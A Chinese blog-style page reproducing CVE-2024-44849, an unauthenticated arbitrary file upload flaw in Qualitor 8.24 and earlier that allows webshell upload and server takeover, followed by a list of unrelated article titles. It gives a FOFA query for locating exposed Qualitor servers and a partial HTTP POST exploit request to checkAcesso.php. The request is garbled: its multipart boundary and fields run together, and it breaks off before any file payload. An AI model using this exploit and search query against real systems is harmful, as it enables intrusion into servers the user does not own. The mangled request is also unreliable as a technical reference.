当前位置: 首页 > news >正文

Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)

news 2025/8/25 0:48:14

0x01 漏洞概述

Qualitor 8.24及之前版本存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。

0x02 复现环境

FOFA:app="Qualitor-Web"

80557ac0230340b8bb6854e0b2a362a2.png

0x03 漏洞复现

PoC

POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=---------------------------QUALITORspaceCVEspace2024space44849-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="idtipo"2
-----------------------------QUALITORspaceCVEspace2024space44849
Content-Disposition: form-data; name="nmfilestorage"----
http://www.lryc.cn/news/460268.html

相关文章:

  • PHP-FPM和FastCGI
  • 【Linux快速入门(二)】Linux与ROS学习之编译基础(make编译)
  • jupyterlab的安装与使用攻略/包括汉化方法
  • std::list
  • opencv-rust 系列2: camera_calibration
  • JVM和GC案例详解
  • postgreSql下载安装
  • GPT-SOVIT模型部署指南
  • 怎么定时发朋友圈?
  • 如何利用phpstudy创建mysql数据库
  • 五、Linux之Vi和Vim编辑器
  • git删除错误的commit
  • 代码随想录算法训练营Day08 | 344.反转字符串、541. 反转字符串II、卡码网:54.替换数字
  • mysql锁之乐观锁、悲观锁、表锁、行锁、共享锁、排他锁
  • 【软件干货】Android应用进程如何保活?
  • neo4j部署保姆级教程
  • 【STM32CubeMX开发】-2.2-TIM_输出一个PWM信号
  • Ngx+Lua+Redis 快速存储POST数据
  • go-delve的使用
  • Python网络爬虫技术详解
  • Golang | Leetcode Golang题解之第474题一和零
  • 算法刷题技巧
  • BMS、EMS PCS 简介
  • spug3发布项目
  • 鸿蒙HarmonyOS开发:应用权限的基本概念及如何申请应用权限详细介绍
  • mac 桌面版docker no space left on device
  • 基于CIM的街镇基层治理统一指挥平台建设方案
  • PostgreSQL学习笔记三:数据类型和运算符
  • ROS理论与实践学习笔记——6 ROS机器人导航(仿真)
  • uniapp开发微信小程序,button的open-type=“share“ 分享给个人跳转到首页问题